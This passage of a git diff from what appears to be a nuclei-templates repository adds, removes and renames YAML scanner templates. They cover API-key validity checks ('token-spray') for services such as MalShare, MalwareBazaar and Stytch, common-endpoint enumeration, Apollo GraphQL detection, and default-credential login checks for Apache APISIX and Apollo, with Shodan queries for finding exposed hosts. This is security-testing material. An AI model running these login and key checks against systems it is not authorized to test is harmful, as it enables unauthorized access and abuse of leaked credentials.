{{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" + read: 1024 + host: + - "tls://smtp.mandrillapp.com:465" + matchers: + - type: word + words: + - "success" diff --git a/nuclei-templates/Other/api-malshare-456.yaml b/nuclei-templates/Other/api-malshare-456.yaml new file mode 100644 index 0000000000..d486f6f0fd --- /dev/null +++ b/nuclei-templates/Other/api-malshare-456.yaml @@ -0,0 +1,24 @@ +id: api-malshare + +info: + name: MalShare API Test + author: daffainfo + severity: info + reference: + - https://malshare.com/doc.php + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + tags: token-spray,malshare + +self-contained: true +requests: + - method: GET + path: + - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" + + matchers: + - type: word + part: body + words: + - '"md5":' + - '"sha1":' + condition: and diff --git a/nuclei-templates/Other/api-malshare-457.yaml b/nuclei-templates/Other/api-malshare-457.yaml deleted file mode 100644 index b1108b4e33..0000000000 --- a/nuclei-templates/Other/api-malshare-457.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-malshare - -info: - name: MalShare API Test - author: daffainfo - severity: info - reference: - - https://malshare.com/doc.php - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md - tags: token-spray,malshare - -self-contained: true -requests: - - method: GET - path: - - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" - - matchers: - - type: word - part: body - words: - - '"md5":' - - '"sha1":' - condition: and diff --git a/nuclei-templates/Other/api-malwarebazaar-459.yaml b/nuclei-templates/Other/api-malwarebazaar-459.yaml new file mode 100644 index 0000000000..ce99bd0a43 --- /dev/null +++ b/nuclei-templates/Other/api-malwarebazaar-459.yaml @@ -0,0 +1,40 @@ +id: api-malwarebazaar + +info: + name: MalwareBazaar API Test + author: daffainfo + severity: info + reference: + - https://bazaar.abuse.ch/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + tags: token-spray,malwarebazaar + +self-contained: true +requests: + - raw: + - | + POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 + Host: mb-api.abuse.ch + API-KEY: {{token}} + Content-Length: 0 + Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 + + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="json_data" + Content-Type: application/json + + {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="file"; filename="1.txt" + + dssd + + --545d0ca717a743c3bd4fa575585f74c6-- + + matchers: + - type: word + part: body + words: + - '"query_status": "inserted"' + - '"query_status": "file_already_known"' + condition: or diff --git a/nuclei-templates/Other/api-malwarebazaar.yaml b/nuclei-templates/Other/api-malwarebazaar.yaml deleted file mode 100644 index f261796b92..0000000000 --- a/nuclei-templates/Other/api-malwarebazaar.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: api-malwarebazaar - -info: - name: MalwareBazaar API Test - author: daffainfo - severity: info - reference: - - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md - tags: token-spray,malwarebazaar - -self-contained: true -requests: - - raw: - - | - POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 - Host: mb-api.abuse.ch - API-KEY: {{token}} - Content-Length: 0 - Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 - - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="json_data" - Content-Type: application/json - - {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="file"; filename="1.txt" - - dssd - - --545d0ca717a743c3bd4fa575585f74c6-- - - matchers: - - type: word - part: body - words: - - '"query_status": "inserted"' - - '"query_status": "file_already_known"' - condition: or diff --git a/nuclei-templates/Other/api-mojoauth-466.yaml b/nuclei-templates/Other/api-mojoauth-466.yaml deleted file mode 100644 index f6cafe6873..0000000000 --- a/nuclei-templates/Other/api-mojoauth-466.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/MojoAuth.md - tags: token-spray,mojoauth - -self-contained: true -requests: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and diff --git a/nuclei-templates/Other/api-mojoauth.yaml b/nuclei-templates/Other/api-mojoauth.yaml new file mode 100644 index 0000000000..db56c9a9bc --- /dev/null +++ b/nuclei-templates/Other/api-mojoauth.yaml @@ -0,0 +1,28 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + description: Secure and modern passwordless authentication platform + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/nuclei-templates/Other/api-mywot.yaml b/nuclei-templates/Other/api-mywot-468.yaml similarity index 100% rename from nuclei-templates/Other/api-mywot.yaml rename to nuclei-templates/Other/api-mywot-468.yaml diff --git a/nuclei-templates/Other/api-nerdgraph-469.yaml b/nuclei-templates/Other/api-nerdgraph-469.yaml deleted file mode 100644 index 9d09249556..0000000000 --- a/nuclei-templates/Other/api-nerdgraph-469.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-nerdgraph -info: - name: New Relic NerdGraph API Test - author: zzeitlin - reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ - severity: info - tags: token-spray,newrelic,nerdgraph -requests: - - method: POST - path: - - "https://api.newrelic.com/graphql" - headers: - Content-Type: application/json - API-Key: "{{token}}" - body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" - matchers: - - type: word - part: body - negative: true - words: - - 'errors' diff --git a/nuclei-templates/Other/api-netlify-470.yaml b/nuclei-templates/Other/api-netlify.yaml similarity index 100% rename from nuclei-templates/Other/api-netlify-470.yaml rename to nuclei-templates/Other/api-netlify.yaml diff --git a/nuclei-templates/Other/api-openweather.yaml b/nuclei-templates/Other/api-openweather-473.yaml similarity index 100% rename from nuclei-templates/Other/api-openweather.yaml rename to nuclei-templates/Other/api-openweather-473.yaml diff --git a/nuclei-templates/Other/api-optimizely.yaml b/nuclei-templates/Other/api-optimizely-474.yaml similarity index 100% rename from nuclei-templates/Other/api-optimizely.yaml rename to nuclei-templates/Other/api-optimizely-474.yaml diff --git a/nuclei-templates/Other/api-pagerduty-475.yaml b/nuclei-templates/Other/api-pagerduty.yaml similarity index 100% rename from nuclei-templates/Other/api-pagerduty-475.yaml rename to nuclei-templates/Other/api-pagerduty.yaml diff --git a/nuclei-templates/Other/api-particle.yaml b/nuclei-templates/Other/api-particle-476.yaml similarity index 100% rename from nuclei-templates/Other/api-particle.yaml rename to nuclei-templates/Other/api-particle-476.yaml diff --git a/nuclei-templates/Other/api-paypal-478.yaml b/nuclei-templates/Other/api-paypal.yaml similarity index 100% rename from nuclei-templates/Other/api-paypal-478.yaml rename to nuclei-templates/Other/api-paypal.yaml diff --git a/nuclei-templates/Other/api-pendo-479.yaml b/nuclei-templates/Other/api-pendo.yaml similarity index 100% rename from nuclei-templates/Other/api-pendo-479.yaml rename to nuclei-templates/Other/api-pendo.yaml diff --git a/nuclei-templates/Other/api-petfinder-480.yaml b/nuclei-templates/Other/api-petfinder-480.yaml deleted file mode 100644 index 17fd3a85c3..0000000000 --- a/nuclei-templates/Other/api-petfinder-480.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-petfinder - -info: - name: Petfinder API Test - author: daffainfo - severity: info - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md - tags: token-spray,petfinder - -self-contained: true -requests: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and diff --git a/nuclei-templates/Other/api-petfinder.yaml b/nuclei-templates/Other/api-petfinder.yaml new file mode 100644 index 0000000000..ae0b6866a1 --- /dev/null +++ b/nuclei-templates/Other/api-petfinder.yaml @@ -0,0 +1,31 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder + tags: token-spray,petfinder + +self-contained: true +requests: + - raw: + - | + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and diff --git a/nuclei-templates/Other/api-pinata-481.yaml b/nuclei-templates/Other/api-pinata-481.yaml new file mode 100644 index 0000000000..f34ec36837 --- /dev/null +++ b/nuclei-templates/Other/api-pinata-481.yaml @@ -0,0 +1,27 @@ +id: api-pinata + +info: + name: Pinata API Test + author: daffainfo + severity: info + reference: + - https://docs.pinata.cloud/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pinata.md + tags: token-spray,pinata + +self-contained: true +requests: + - raw: + - | + GET https://api.pinata.cloud/data/pinList?status=pinned HTTP/1.1 + Host: api.pinata.cloud + pinata_api_key: {{token}} + pinata_secret_api_key: {{secret}} + + matchers: + - type: word + part: body + words: + - '"id"' + - '"ipfs_pin_hash"' + condition: and diff --git a/nuclei-templates/Other/api-pinata.yaml b/nuclei-templates/Other/api-pinata.yaml deleted file mode 100644 index 89660d1f6e..0000000000 --- a/nuclei-templates/Other/api-pinata.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-pinata - -info: - name: Pinata API Test - author: daffainfo - severity: info - description: IPFS Pinning Services API - reference: - - https://docs.pinata.cloud/ - - https://github.com/daffainfo/all-about-apikey/tree/main/pinata - tags: token-spray,pinata - -self-contained: true -requests: - - raw: - - | - GET https://api.pinata.cloud/data/pinList?status=pinned HTTP/1.1 - Host: api.pinata.cloud - pinata_api_key: {{token}} - pinata_secret_api_key: {{secret}} - - matchers: - - type: word - part: body - words: - - '"id"' - - '"ipfs_pin_hash"' - condition: and diff --git a/nuclei-templates/Other/postmark.yaml b/nuclei-templates/Other/api-postmark.yaml similarity index 100% rename from nuclei-templates/Other/postmark.yaml rename to nuclei-templates/Other/api-postmark.yaml diff --git a/nuclei-templates/Other/api-rijksmuseum-486.yaml b/nuclei-templates/Other/api-rijksmuseum-486.yaml deleted file mode 100644 index 6e6c1c40cd..0000000000 --- a/nuclei-templates/Other/api-rijksmuseum-486.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-rijksmuseum - -info: - name: Rijksmuseum API Test - author: daffainfo - severity: info - reference: - - https://data.rijksmuseum.nl/user-generated-content/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md - tags: token-spray,rijksmuseum - -self-contained: true -requests: - - method: GET - path: - - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" - - matchers: - - type: word - part: body - words: - - '"count":' - - '"userSets":' - - '"user":' - condition: and diff --git a/nuclei-templates/Other/api-rijksmuseum.yaml b/nuclei-templates/Other/api-rijksmuseum.yaml new file mode 100644 index 0000000000..11327595a7 --- /dev/null +++ b/nuclei-templates/Other/api-rijksmuseum.yaml @@ -0,0 +1,25 @@ +id: api-rijksmuseum + +info: + name: Rijksmuseum API Test + author: daffainfo + severity: info + reference: + - https://data.rijksmuseum.nl/user-generated-content/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md + tags: token-spray,rijksmuseum + +self-contained: true +requests: + - method: GET + path: + - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" + + matchers: + - type: word + part: body + words: + - '"count":' + - '"userSets":' + - '"user":' + condition: and diff --git a/nuclei-templates/Other/api-scanii.yaml b/nuclei-templates/Other/api-scanii-487.yaml similarity index 100% rename from nuclei-templates/Other/api-scanii.yaml rename to nuclei-templates/Other/api-scanii-487.yaml diff --git a/nuclei-templates/Other/api-slack-493.yaml b/nuclei-templates/Other/api-slack.yaml similarity index 100% rename from nuclei-templates/Other/api-slack-493.yaml rename to nuclei-templates/Other/api-slack.yaml diff --git a/nuclei-templates/Other/api-square-496.yaml b/nuclei-templates/Other/api-square-496.yaml deleted file mode 100644 index f90e538715..0000000000 --- a/nuclei-templates/Other/api-square-496.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-square -info: - name: Square API Test - author: zzeitlin - reference: https://developer.squareup.com/explorer/square/locations-api/list-locations - severity: info - tags: token-spray,square -requests: - - method: GET - path: - - "https://connect.squareup.com/v2/locations" - - "https://connect.squareupsandbox.com/v2/locations" - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - 'errors' - negative: true diff --git a/nuclei-templates/Other/api-strava.yaml b/nuclei-templates/Other/api-strava-498.yaml similarity index 100% rename from nuclei-templates/Other/api-strava.yaml rename to nuclei-templates/Other/api-strava-498.yaml diff --git a/nuclei-templates/Other/api-stytch-500.yaml b/nuclei-templates/Other/api-stytch-500.yaml deleted file mode 100644 index d410066fa0..0000000000 --- a/nuclei-templates/Other/api-stytch-500.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-stytch - -info: - name: Stytch API Test - author: daffainfo - severity: info - reference: - - https://stytch.com/docs/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md - tags: token-spray,stytch - -self-contained: true -requests: - - raw: - - | - POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(id + ':' + secret)}} - Host: test.stytch.com - Content-Type: application/json - - {"email": "test@stytch.com"} - - matchers: - - type: word - part: body - words: - - '"status_code":' - - '"request_id":' - - '"user_id":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-stytch.yaml b/nuclei-templates/Other/api-stytch.yaml new file mode 100644 index 0000000000..37caf808d3 --- /dev/null +++ b/nuclei-templates/Other/api-stytch.yaml @@ -0,0 +1,31 @@ +id: api-stytch + +info: + name: Stytch API Test + author: daffainfo + severity: info + description: User infrastructure for modern applications + reference: + - https://stytch.com/docs/api + - https://github.com/daffainfo/all-about-apikey/tree/main/stytch + tags: token-spray,stytch + +self-contained: true +requests: + - raw: + - | + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(id + ':' + secret)}} + Host: test.stytch.com + Content-Type: application/json + + {"email": "test@stytch.com"} + + matchers: + - type: word + part: body + words: + - '"status_code":' + - '"request_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-taiga-501.yaml b/nuclei-templates/Other/api-taiga.yaml similarity index 100% rename from nuclei-templates/Other/api-taiga-501.yaml rename to nuclei-templates/Other/api-taiga.yaml diff --git a/nuclei-templates/Other/api-thecatapi-502.yaml b/nuclei-templates/Other/api-thecatapi-503.yaml similarity index 100% rename from nuclei-templates/Other/api-thecatapi-502.yaml rename to nuclei-templates/Other/api-thecatapi-503.yaml diff --git a/nuclei-templates/Other/api-twitter.yaml b/nuclei-templates/Other/api-twitter-507.yaml similarity index 100% rename from nuclei-templates/Other/api-twitter.yaml rename to nuclei-templates/Other/api-twitter-507.yaml diff --git a/nuclei-templates/Other/api-vercel-510.yaml b/nuclei-templates/Other/api-vercel.yaml similarity index 100% rename from nuclei-templates/Other/api-vercel-510.yaml rename to nuclei-templates/Other/api-vercel.yaml diff --git a/nuclei-templates/Other/api-virustotal.yaml b/nuclei-templates/Other/api-virustotal-512.yaml similarity index 100% rename from nuclei-templates/Other/api-virustotal.yaml rename to nuclei-templates/Other/api-virustotal-512.yaml diff --git a/nuclei-templates/Other/api-visualstudio-513.yaml b/nuclei-templates/Other/api-visualstudio.yaml similarity index 100% rename from nuclei-templates/Other/api-visualstudio-513.yaml rename to nuclei-templates/Other/api-visualstudio.yaml diff --git a/nuclei-templates/Other/api-webex.yaml b/nuclei-templates/Other/api-webex-515.yaml similarity index 100% rename from nuclei-templates/Other/api-webex.yaml rename to nuclei-templates/Other/api-webex-515.yaml diff --git a/nuclei-templates/Other/api-weglot-516.yaml b/nuclei-templates/Other/api-weglot.yaml similarity index 100% rename from nuclei-templates/Other/api-weglot-516.yaml rename to nuclei-templates/Other/api-weglot.yaml diff --git a/nuclei-templates/Other/api-youtube.yaml b/nuclei-templates/Other/api-youtube-519.yaml similarity index 100% rename from nuclei-templates/Other/api-youtube.yaml rename to nuclei-templates/Other/api-youtube-519.yaml diff --git a/nuclei-templates/Other/api_endpoints.yaml b/nuclei-templates/Other/api_endpoints.yaml new file mode 100644 index 0000000000..245227a481 --- /dev/null +++ b/nuclei-templates/Other/api_endpoints.yaml @@ -0,0 +1,78 @@ +id: api-endpoints + +info: + name: Common API Endpoints + author: panch0r3d + severity: info + reference: + - https://github.com/1in9e/my-nuclei-templates/blob/main/api_endpoints.yaml + tags: info,api,apis,misc + +http: + - method: GET + headers: + Accept: application/json + path: + - "{{BaseURL}}/server/api/admin" + - "{{BaseURL}}/api/v1" + - "{{BaseURL}}/api/v2" + - "{{BaseURL}}/api/v3" + - "{{BaseURL}}/api/v4" + - "{{BaseURL}}/api/v5" + - "{{BaseURL}}/api/v1/users" + - "{{BaseURL}}/api/v2/users" + - "{{BaseURL}}/api/v3/users" + - "{{BaseURL}}/api/v4/users" + - "{{BaseURL}}/api/v5/users" + - "{{BaseURL}}/api/v1/orders" + - "{{BaseURL}}/api/v2/orders" + - "{{BaseURL}}/api/v3/orders" + - "{{BaseURL}}/api/v4/orders" + - "{{BaseURL}}/api/v5/orders" + - "{{BaseURL}}/api/v1/config" + - "{{BaseURL}}/api/v2/config" + - "{{BaseURL}}/api/v3/config" + - "{{BaseURL}}/api/v4/config" + - "{{BaseURL}}/api/v5/config" + - "{{BaseURL}}/api/v1/webhooks" + - "{{BaseURL}}/api/v2/webhooks" + - "{{BaseURL}}/api/v3/webhooks" + - "{{BaseURL}}/api/v4/webhooks" + - "{{BaseURL}}/api/v5/webhooks" + - "{{BaseURL}}/api/v1/health" + - "{{BaseURL}}/api/v2/health" + - "{{BaseURL}}/api/v3/health" + - "{{BaseURL}}/api/v4/health" + - "{{BaseURL}}/api/v5/health" + - "{{BaseURL}}/api/v1/accounts" + - "{{BaseURL}}/api/v2/accounts" + - "{{BaseURL}}/api/v3/accounts" + - "{{BaseURL}}/api/v4/accounts" + - "{{BaseURL}}/api/v5/accounts" + - "{{BaseURL}}/api/health" + - "{{BaseURL}}/api/config" + - "{{BaseURL}}/api/users" + - "{{BaseURL}}/api/orders" + - "{{BaseURL}}/api/webhooks" + - "{{BaseURL}}/api/accounts" + - "{{BaseURL}}/api/admin" + - "{{BaseURL}}/api/account/metadata/" + - "{{BaseURL}}/rest/api/health" + - "{{BaseURL}}/rest/api/config" + - "{{BaseURL}}/rest/api/users" + - "{{BaseURL}}/rest/api/orders" + - "{{BaseURL}}/rest/api/webhooks" + - "{{BaseURL}}/docs" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Content-Type: application/json" + part: header + +# Enhanced \ No newline at end of file diff --git a/nuclei-templates/Other/apiman-panel-464.yaml b/nuclei-templates/Other/apiman-panel-460.yaml similarity index 100% rename from nuclei-templates/Other/apiman-panel-464.yaml rename to nuclei-templates/Other/apiman-panel-460.yaml diff --git a/nuclei-templates/Other/apisix-default-login-491.yaml b/nuclei-templates/Other/apisix-default-login-491.yaml deleted file mode 100644 index c16b0c60b1..0000000000 --- a/nuclei-templates/Other/apisix-default-login-491.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: apisix-default-login -info: - name: Apache Apisix Default Login - author: pdteam - severity: critical - tags: apisix,apache,default-login - metadata: - shodan-query: title:"Apache APISIX Dashboard" - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org -requests: - - raw: - - | - POST /apisix/admin/user/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Authorization: - Content-Type: application/json;charset=UTF-8 - - {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork - payloads: - user: - - admin - pass: - - admin - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '"data"' - - '"token"' - - '"code":0' - condition: and diff --git a/nuclei-templates/Other/apisix-default-login-492.yaml b/nuclei-templates/Other/apisix-default-login-492.yaml new file mode 100644 index 0000000000..685f414bf6 --- /dev/null +++ b/nuclei-templates/Other/apisix-default-login-492.yaml @@ -0,0 +1,46 @@ +id: apisix-default-login +info: + name: Apache Apisix Default Admin Login + author: pdteam + severity: high + description: An Apache Apisix default admin login was discovered. + metadata: + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: apisix,apache,default-login +requests: + - raw: + - | + POST /apisix/admin/user/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Authorization: + Content-Type: application/json;charset=UTF-8 + + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"data"' + - '"token"' + - '"code":0' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/apollo-default-login-520.yaml b/nuclei-templates/Other/apollo-default-login-520.yaml deleted file mode 100644 index c9e119d097..0000000000 --- a/nuclei-templates/Other/apollo-default-login-520.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: apollo-default-login - -info: - name: Apollo Default Login - author: PaperPen - severity: high - description: An Apollo default login was discovered. - reference: - - https://github.com/apolloconfig/apollo - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:11794165 - tags: apollo,default-login - -requests: - - raw: - - | - POST /signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{BaseURL}}/signin? - - username={{user}}&password={{pass}}&login-submit=Login - - - | - GET /user HTTP/1.1 - Host: {{Hostname}} - - attack: pitchfork - payloads: - user: - - apollo - pass: - - admin - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_2 - words: - - '"userId":' - - '"email":' - condition: or - - - type: dsl - dsl: - - "status_code_1 == 302 && status_code_2 == 200" - - "contains(tolower(all_headers_2), 'application/json')" - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/apollo-default-login-521.yaml b/nuclei-templates/Other/apollo-default-login-521.yaml new file mode 100644 index 0000000000..03709bd616 --- /dev/null +++ b/nuclei-templates/Other/apollo-default-login-521.yaml @@ -0,0 +1,55 @@ +id: apollo-default-login + +info: + name: Apollo Default Login + author: PaperPen + severity: high + description: An Apollo default login was discovered. + reference: + - https://github.com/apolloconfig/apollo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 + shodan-query: http.favicon.hash:11794165 + tags: apollo,default-login + +http: + - raw: + - | + POST /signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/signin? + + username={{user}}&password={{pass}}&login-submit=Login + - | + GET /user HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + user: + - apollo + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '"userId":' + - '"email":' + condition: or + + - type: dsl + dsl: + - "status_code_1 == 302 && status_code_2 == 200" + - "contains(tolower(header_2), 'application/json')" + condition: and + +# digest: 4a0a004730450220546faaa98906288873457aaf445639368f32ddc0a459ae0362b9c87333a0832d022100a718e9fdccaa633152c35bd8f59d89e60a8a24f359521d6c6b0232fe8a07e196:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apollo-server-detect-522.yaml b/nuclei-templates/Other/apollo-server-detect-522.yaml deleted file mode 100644 index 18fc8f973f..0000000000 --- a/nuclei-templates/Other/apollo-server-detect-522.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: apollo-server-detect - -info: - name: Apollo Server GraphQL introspection detection - author: idealphase - severity: info - description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). - reference: - - https://github.com/apollographql/apollo-server - tags: apollo,detect,graphql - -requests: - - method: POST - path: - - "{{BaseURL}}/graphql" - - headers: - Content-Type: application/json - - body: | - {"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "Content-Type: application/json" - - - type: word - part: body - words: - - "GraphQL introspection is not allowed by Apollo Server" - - - type: status - status: - - 400 diff --git a/nuclei-templates/Other/apollo-server-detect.yaml b/nuclei-templates/Other/apollo-server-detect.yaml new file mode 100644 index 0000000000..8c2dee07bc --- /dev/null +++ b/nuclei-templates/Other/apollo-server-detect.yaml @@ -0,0 +1,36 @@ +id: apollo-server-detect + +info: + name: Apollo Server GraphQL introspection detection + author: idealphase + severity: info + description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). + reference: https://github.com/apollographql/apollo-server + tags: apollo,detect,graphql + +requests: + - method: POST + path: + - "{{BaseURL}}/graphql" + + headers: + Content-Type: application/json + + body: | + {"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Content-Type: application/json" + + - type: word + part: body + words: + - "GraphQL introspection is not allowed by Apollo Server" + + - type: status + status: + - 400 diff --git a/nuclei-templates/Other/apple-app-site-association-524.yaml b/nuclei-templates/Other/apple-app-site-association-524.yaml new file mode 100644 index 0000000000..5e3aa3c443 --- /dev/null +++ b/nuclei-templates/Other/apple-app-site-association-524.yaml @@ 